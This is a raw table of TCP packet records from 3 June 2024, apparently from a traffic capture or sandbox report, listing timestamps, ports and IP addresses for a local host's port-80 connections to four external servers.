Jun 3, 2024 08:52:15.754503965 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.754511118 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.754518032 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.754528999 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.754543066 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.754550934 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.754558086 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.754570961 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.754578114 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.754585981 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.754594088 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.754604101 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.754612923 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.754625082 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.754630089 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.754642010 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.754650116 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.754658937 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.754683971 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.755283117 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.755292892 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.755302906 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.755312920 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.755321980 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.755332947 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.755345106 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.755350113 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.755357981 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.755364895 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.755376101 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.755387068 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.755395889 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.755403042 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.755408049 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.755417109 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.755424023 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.755434990 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.755454063 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.755465031 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.756042004 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.756051064 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.756059885 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.756071091 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.756078959 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.756088972 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.756098032 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.756107092 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.756118059 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.756125927 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.756134987 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.756145954 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.756153107 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.756161928 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.756169081 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.756177902 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.756186962 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.756192923 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.756201982 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.756211042 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.756218910 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.756227970 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.756237984 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.756249905 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.756256104 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.756263971 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.756282091 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.756872892 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.756884098 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.756894112 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.756905079 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.756912947 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.756926060 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.756932020 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.756937981 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.756947994 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.756954908 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.756963968 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.756973982 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.756980896 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.756990910 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.756998062 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.757009029 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.757014990 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.757021904 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.757030964 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.757039070 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.757049084 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.757060051 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.757066965 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.757080078 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.757086039 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.757091999 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.757101059 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.757112980 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.757128954 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.757859945 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.757870913 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.757880926 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.757891893 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.757900953 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.757909060 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.757919073 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.757927895 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.757936954 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.757945061 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.757955074 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.757965088 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.757972956 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.757981062 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.757991076 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.757997036 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.758006096 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.758014917 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.758029938 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.758034945 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.758043051 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.758050919 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.758059025 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.758068085 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.758080006 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.758090019 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.758100986 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.758115053 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.758696079 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.758789062 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.758800030 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.758809090 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.758819103 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.758831978 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.758837938 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.758846998 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.758857012 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.758862972 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.758872032 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.758881092 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.758892059 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.758899927 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.758908987 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.758917093 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.758929014 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.758934975 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.758941889 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.758951902 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.758959055 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.758969069 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.758980036 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.758986950 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.758996964 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.759006023 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.759016991 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.759025097 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.759032965 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.759056091 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.759655952 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.759668112 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.759675980 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.759686947 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.759696960 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.759706974 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.759720087 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.759725094 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.759732008 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.759742022 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.759748936 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.759757996 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.759771109 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.759778023 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.759794950 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.760107994 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.760118008 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.760128975 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.760142088 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.760153055 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.760166883 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.760373116 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.760412931 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.760437965 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.760478973 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.762121916 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.762183905 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:42.689834118 CEST	49164	80	192.168.2.22	54.38.220.85
Jun 3, 2024 08:52:42.695609093 CEST	80	49164	54.38.220.85	192.168.2.22
Jun 3, 2024 08:52:42.695677996 CEST	49164	80	192.168.2.22	54.38.220.85
Jun 3, 2024 08:52:42.695924997 CEST	49164	80	192.168.2.22	54.38.220.85
Jun 3, 2024 08:52:42.703644037 CEST	80	49164	54.38.220.85	192.168.2.22
Jun 3, 2024 08:52:42.703655005 CEST	80	49164	54.38.220.85	192.168.2.22
Jun 3, 2024 08:52:42.703699112 CEST	49164	80	192.168.2.22	54.38.220.85
Jun 3, 2024 08:52:42.711052895 CEST	80	49164	54.38.220.85	192.168.2.22
Jun 3, 2024 08:52:43.517334938 CEST	80	49164	54.38.220.85	192.168.2.22
Jun 3, 2024 08:52:43.517432928 CEST	49164	80	192.168.2.22	54.38.220.85
Jun 3, 2024 08:52:44.195544958 CEST	49164	80	192.168.2.22	54.38.220.85
Jun 3, 2024 08:52:44.200530052 CEST	80	49164	54.38.220.85	192.168.2.22
Jun 3, 2024 08:52:45.209851027 CEST	49165	80	192.168.2.22	54.38.220.85
Jun 3, 2024 08:52:45.214968920 CEST	80	49165	54.38.220.85	192.168.2.22
Jun 3, 2024 08:52:45.215100050 CEST	49165	80	192.168.2.22	54.38.220.85
Jun 3, 2024 08:52:45.215352058 CEST	49165	80	192.168.2.22	54.38.220.85
Jun 3, 2024 08:52:45.220258951 CEST	80	49165	54.38.220.85	192.168.2.22
Jun 3, 2024 08:52:46.161379099 CEST	80	49165	54.38.220.85	192.168.2.22
Jun 3, 2024 08:52:46.161643028 CEST	49165	80	192.168.2.22	54.38.220.85
Jun 3, 2024 08:52:46.722855091 CEST	49165	80	192.168.2.22	54.38.220.85
Jun 3, 2024 08:52:46.727833033 CEST	80	49165	54.38.220.85	192.168.2.22
Jun 3, 2024 08:52:47.737493992 CEST	49166	80	192.168.2.22	54.38.220.85
Jun 3, 2024 08:52:47.742590904 CEST	80	49166	54.38.220.85	192.168.2.22
Jun 3, 2024 08:52:47.742713928 CEST	49166	80	192.168.2.22	54.38.220.85
Jun 3, 2024 08:52:47.743140936 CEST	49166	80	192.168.2.22	54.38.220.85
Jun 3, 2024 08:52:47.748009920 CEST	80	49166	54.38.220.85	192.168.2.22
Jun 3, 2024 08:52:47.748110056 CEST	49166	80	192.168.2.22	54.38.220.85
Jun 3, 2024 08:52:47.748192072 CEST	80	49166	54.38.220.85	192.168.2.22
Jun 3, 2024 08:52:47.753025055 CEST	80	49166	54.38.220.85	192.168.2.22
Jun 3, 2024 08:52:47.753134012 CEST	80	49166	54.38.220.85	192.168.2.22
Jun 3, 2024 08:52:48.570363998 CEST	80	49166	54.38.220.85	192.168.2.22
Jun 3, 2024 08:52:48.570574045 CEST	49166	80	192.168.2.22	54.38.220.85
Jun 3, 2024 08:52:49.250082016 CEST	49166	80	192.168.2.22	54.38.220.85
Jun 3, 2024 08:52:49.255110979 CEST	80	49166	54.38.220.85	192.168.2.22
Jun 3, 2024 08:52:50.264497042 CEST	49167	80	192.168.2.22	54.38.220.85
Jun 3, 2024 08:52:50.269643068 CEST	80	49167	54.38.220.85	192.168.2.22
Jun 3, 2024 08:52:50.269768953 CEST	49167	80	192.168.2.22	54.38.220.85
Jun 3, 2024 08:52:50.269937992 CEST	49167	80	192.168.2.22	54.38.220.85
Jun 3, 2024 08:52:50.274791002 CEST	80	49167	54.38.220.85	192.168.2.22
Jun 3, 2024 08:52:51.103182077 CEST	80	49167	54.38.220.85	192.168.2.22
Jun 3, 2024 08:52:51.225207090 CEST	80	49167	54.38.220.85	192.168.2.22
Jun 3, 2024 08:52:51.225325108 CEST	49167	80	192.168.2.22	54.38.220.85
Jun 3, 2024 08:52:51.225408077 CEST	49167	80	192.168.2.22	54.38.220.85
Jun 3, 2024 08:52:51.230335951 CEST	80	49167	54.38.220.85	192.168.2.22
Jun 3, 2024 08:52:56.082910061 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:56.088195086 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:56.088243961 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:56.317007065 CEST	49168	80	192.168.2.22	194.9.94.86
Jun 3, 2024 08:52:56.321954966 CEST	80	49168	194.9.94.86	192.168.2.22
Jun 3, 2024 08:52:56.322010994 CEST	49168	80	192.168.2.22	194.9.94.86
Jun 3, 2024 08:52:56.322264910 CEST	49168	80	192.168.2.22	194.9.94.86
Jun 3, 2024 08:52:56.327158928 CEST	80	49168	194.9.94.86	192.168.2.22
Jun 3, 2024 08:52:56.327203989 CEST	49168	80	192.168.2.22	194.9.94.86
Jun 3, 2024 08:52:56.327296019 CEST	80	49168	194.9.94.86	192.168.2.22
Jun 3, 2024 08:52:56.332140923 CEST	80	49168	194.9.94.86	192.168.2.22
Jun 3, 2024 08:52:57.153166056 CEST	80	49168	194.9.94.86	192.168.2.22
Jun 3, 2024 08:52:57.153187990 CEST	80	49168	194.9.94.86	192.168.2.22
Jun 3, 2024 08:52:57.153198957 CEST	80	49168	194.9.94.86	192.168.2.22
Jun 3, 2024 08:52:57.153212070 CEST	80	49168	194.9.94.86	192.168.2.22
Jun 3, 2024 08:52:57.153224945 CEST	80	49168	194.9.94.86	192.168.2.22
Jun 3, 2024 08:52:57.153306961 CEST	80	49168	194.9.94.86	192.168.2.22
Jun 3, 2024 08:52:57.153340101 CEST	49168	80	192.168.2.22	194.9.94.86
Jun 3, 2024 08:52:57.273919106 CEST	80	49168	194.9.94.86	192.168.2.22
Jun 3, 2024 08:52:57.279906034 CEST	49168	80	192.168.2.22	194.9.94.86
Jun 3, 2024 08:52:57.832053900 CEST	49168	80	192.168.2.22	194.9.94.86
Jun 3, 2024 08:52:58.844310045 CEST	49169	80	192.168.2.22	194.9.94.86
Jun 3, 2024 08:52:58.849551916 CEST	80	49169	194.9.94.86	192.168.2.22
Jun 3, 2024 08:52:58.849628925 CEST	49169	80	192.168.2.22	194.9.94.86
Jun 3, 2024 08:52:58.849838018 CEST	49169	80	192.168.2.22	194.9.94.86
Jun 3, 2024 08:52:58.854774952 CEST	80	49169	194.9.94.86	192.168.2.22
Jun 3, 2024 08:52:59.682888985 CEST	80	49169	194.9.94.86	192.168.2.22
Jun 3, 2024 08:52:59.682909966 CEST	80	49169	194.9.94.86	192.168.2.22
Jun 3, 2024 08:52:59.682924032 CEST	80	49169	194.9.94.86	192.168.2.22
Jun 3, 2024 08:52:59.682969093 CEST	80	49169	194.9.94.86	192.168.2.22
Jun 3, 2024 08:52:59.682981014 CEST	80	49169	194.9.94.86	192.168.2.22
Jun 3, 2024 08:52:59.682993889 CEST	49169	80	192.168.2.22	194.9.94.86
Jun 3, 2024 08:52:59.683084011 CEST	80	49169	194.9.94.86	192.168.2.22
Jun 3, 2024 08:52:59.683190107 CEST	80	49169	194.9.94.86	192.168.2.22
Jun 3, 2024 08:52:59.683211088 CEST	49169	80	192.168.2.22	194.9.94.86
Jun 3, 2024 08:52:59.800445080 CEST	80	49169	194.9.94.86	192.168.2.22
Jun 3, 2024 08:52:59.802498102 CEST	49169	80	192.168.2.22	194.9.94.86
Jun 3, 2024 08:53:00.357116938 CEST	49169	80	192.168.2.22	194.9.94.86
Jun 3, 2024 08:53:01.371951103 CEST	49170	80	192.168.2.22	194.9.94.86
Jun 3, 2024 08:53:01.377054930 CEST	80	49170	194.9.94.86	192.168.2.22
Jun 3, 2024 08:53:01.379940033 CEST	49170	80	192.168.2.22	194.9.94.86
Jun 3, 2024 08:53:01.380553007 CEST	49170	80	192.168.2.22	194.9.94.86
Jun 3, 2024 08:53:01.385452032 CEST	80	49170	194.9.94.86	192.168.2.22
Jun 3, 2024 08:53:01.385601997 CEST	80	49170	194.9.94.86	192.168.2.22
Jun 3, 2024 08:53:01.385696888 CEST	49170	80	192.168.2.22	194.9.94.86
Jun 3, 2024 08:53:01.390610933 CEST	80	49170	194.9.94.86	192.168.2.22
Jun 3, 2024 08:53:01.390693903 CEST	80	49170	194.9.94.86	192.168.2.22
Jun 3, 2024 08:53:02.210349083 CEST	80	49170	194.9.94.86	192.168.2.22
Jun 3, 2024 08:53:02.210400105 CEST	80	49170	194.9.94.86	192.168.2.22
Jun 3, 2024 08:53:02.210441113 CEST	80	49170	194.9.94.86	192.168.2.22
Jun 3, 2024 08:53:02.210443974 CEST	49170	80	192.168.2.22	194.9.94.86
Jun 3, 2024 08:53:02.210477114 CEST	80	49170	194.9.94.86	192.168.2.22
Jun 3, 2024 08:53:02.210513115 CEST	80	49170	194.9.94.86	192.168.2.22
Jun 3, 2024 08:53:02.210542917 CEST	49170	80	192.168.2.22	194.9.94.86
Jun 3, 2024 08:53:02.210570097 CEST	80	49170	194.9.94.86	192.168.2.22
Jun 3, 2024 08:53:02.210604906 CEST	49170	80	192.168.2.22	194.9.94.86
Jun 3, 2024 08:53:02.210609913 CEST	80	49170	194.9.94.86	192.168.2.22
Jun 3, 2024 08:53:02.331146955 CEST	80	49170	194.9.94.86	192.168.2.22
Jun 3, 2024 08:53:02.331223011 CEST	49170	80	192.168.2.22	194.9.94.86
Jun 3, 2024 08:53:02.884423018 CEST	49170	80	192.168.2.22	194.9.94.86
Jun 3, 2024 08:53:03.899993896 CEST	49171	80	192.168.2.22	194.9.94.86
Jun 3, 2024 08:53:03.906435966 CEST	80	49171	194.9.94.86	192.168.2.22
Jun 3, 2024 08:53:03.908000946 CEST	49171	80	192.168.2.22	194.9.94.86
Jun 3, 2024 08:53:03.908283949 CEST	49171	80	192.168.2.22	194.9.94.86
Jun 3, 2024 08:53:03.914905071 CEST	80	49171	194.9.94.86	192.168.2.22
Jun 3, 2024 08:53:04.744316101 CEST	80	49171	194.9.94.86	192.168.2.22
Jun 3, 2024 08:53:04.744374037 CEST	80	49171	194.9.94.86	192.168.2.22
Jun 3, 2024 08:53:04.744412899 CEST	80	49171	194.9.94.86	192.168.2.22
Jun 3, 2024 08:53:04.744435072 CEST	49171	80	192.168.2.22	194.9.94.86
Jun 3, 2024 08:53:04.744448900 CEST	80	49171	194.9.94.86	192.168.2.22
Jun 3, 2024 08:53:04.744514942 CEST	49171	80	192.168.2.22	194.9.94.86
Jun 3, 2024 08:53:04.744514942 CEST	80	49171	194.9.94.86	192.168.2.22
Jun 3, 2024 08:53:04.868508101 CEST	80	49171	194.9.94.86	192.168.2.22
Jun 3, 2024 08:53:04.868623972 CEST	49171	80	192.168.2.22	194.9.94.86
Jun 3, 2024 08:53:04.868657112 CEST	49171	80	192.168.2.22	194.9.94.86
Jun 3, 2024 08:53:04.877346992 CEST	80	49171	194.9.94.86	192.168.2.22
Jun 3, 2024 08:53:09.890547991 CEST	49172	80	192.168.2.22	91.195.240.19
Jun 3, 2024 08:53:09.897445917 CEST	80	49172	91.195.240.19	192.168.2.22
Jun 3, 2024 08:53:09.897643089 CEST	49172	80	192.168.2.22	91.195.240.19
Jun 3, 2024 08:53:09.897958994 CEST	49172	80	192.168.2.22	91.195.240.19
Jun 3, 2024 08:53:09.904433012 CEST	80	49172	91.195.240.19	192.168.2.22
Jun 3, 2024 08:53:09.904539108 CEST	49172	80	192.168.2.22	91.195.240.19
Jun 3, 2024 08:53:09.904715061 CEST	80	49172	91.195.240.19	192.168.2.22
Jun 3, 2024 08:53:09.910999060 CEST	80	49172	91.195.240.19	192.168.2.22
Jun 3, 2024 08:53:10.750077963 CEST	80	49172	91.195.240.19	192.168.2.22
Jun 3, 2024 08:53:10.880213022 CEST	80	49172	91.195.240.19	192.168.2.22
Jun 3, 2024 08:53:10.880295992 CEST	49172	80	192.168.2.22	91.195.240.19
Jun 3, 2024 08:53:11.403177977 CEST	49172	80	192.168.2.22	91.195.240.19
Jun 3, 2024 08:53:12.423278093 CEST	49173	80	192.168.2.22	91.195.240.19
Jun 3, 2024 08:53:12.429217100 CEST	80	49173	91.195.240.19	192.168.2.22
Jun 3, 2024 08:53:12.429281950 CEST	49173	80	192.168.2.22	91.195.240.19
Jun 3, 2024 08:53:12.429841995 CEST	49173	80	192.168.2.22	91.195.240.19
Jun 3, 2024 08:53:12.434706926 CEST	80	49173	91.195.240.19	192.168.2.22
Jun 3, 2024 08:53:13.273058891 CEST	80	49173	91.195.240.19	192.168.2.22
Jun 3, 2024 08:53:13.401470900 CEST	80	49173	91.195.240.19	192.168.2.22
Jun 3, 2024 08:53:13.401597977 CEST	49173	80	192.168.2.22	91.195.240.19
Jun 3, 2024 08:53:13.931490898 CEST	49173	80	192.168.2.22	91.195.240.19
Jun 3, 2024 08:53:14.943542957 CEST	49174	80	192.168.2.22	91.195.240.19
Jun 3, 2024 08:53:14.948508024 CEST	80	49174	91.195.240.19	192.168.2.22
Jun 3, 2024 08:53:14.948566914 CEST	49174	80	192.168.2.22	91.195.240.19
Jun 3, 2024 08:53:14.948903084 CEST	49174	80	192.168.2.22	91.195.240.19
Jun 3, 2024 08:53:14.953788996 CEST	80	49174	91.195.240.19	192.168.2.22
Jun 3, 2024 08:53:14.953831911 CEST	49174	80	192.168.2.22	91.195.240.19
Jun 3, 2024 08:53:14.953839064 CEST	80	49174	91.195.240.19	192.168.2.22
Jun 3, 2024 08:53:14.958744049 CEST	80	49174	91.195.240.19	192.168.2.22
Jun 3, 2024 08:53:14.958782911 CEST	80	49174	91.195.240.19	192.168.2.22
Jun 3, 2024 08:53:16.456531048 CEST	49174	80	192.168.2.22	91.195.240.19
Jun 3, 2024 08:53:16.462335110 CEST	80	49174	91.195.240.19	192.168.2.22
Jun 3, 2024 08:53:16.462416887 CEST	49174	80	192.168.2.22	91.195.240.19
